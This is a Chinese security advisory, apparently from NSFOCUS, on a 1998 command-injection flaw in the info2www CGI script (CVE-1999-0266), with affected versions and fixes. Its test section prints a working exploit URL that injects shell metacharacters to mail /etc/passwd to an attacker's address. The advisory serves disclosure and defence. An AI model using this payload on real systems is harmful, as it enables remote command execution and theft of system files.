首页 -> 安全研究

安全研究

安全漏洞
Roar Smith info2www远程执行任意命令漏洞

发布日期:1998-03-03
更新日期:1998-03-03

受影响系统:
Roar Smith info2www 1.1
Roar Smith info2www 1.0
不受影响系统:
Roar Smith info2www 1.2
描述:
BUGTRAQ  ID: 1995
CVE(CAN) ID: CVE-1999-0266

“info2www”是一个将GNU Info文本转化成HTML文件的CGI程序。

某些早期版本的info2www脚本实现上存在输入验证漏洞,远程攻击者可以利用此漏洞以Web进程的权限在主机上 执行任意系统命令。

问题在于程序脚本没有过滤用户输入中包含的一些shell元字符,远程攻击者可能以Web守护程序的权限(root或nobody)在主机上执行任意程序。


<*来源:Niall Smart (njs3@doc.ic.ac.uk
  
  链接:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0266
        http://online.securityfocus.com/bid/1995/
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Niall Smart (njs3@doc.ic.ac.uk)提供了如下测试方法:

访问以下URL可以将系统的passwd文件发送到攻击者的邮箱。

http://target/cgi-bin/info2www?'(../../../bin/mail your@email < /etc/passwd|)'

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 如果不需要使用info2www脚本,去除此脚本的执行权限或删除之。

厂商补丁:

Roar Smith
----------
程序作者已经在最新版的软件中修补了此安全漏洞,请到作者的主页下载:

http://www.gnu.org/directory/gnats.html

浏览次数:18340
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障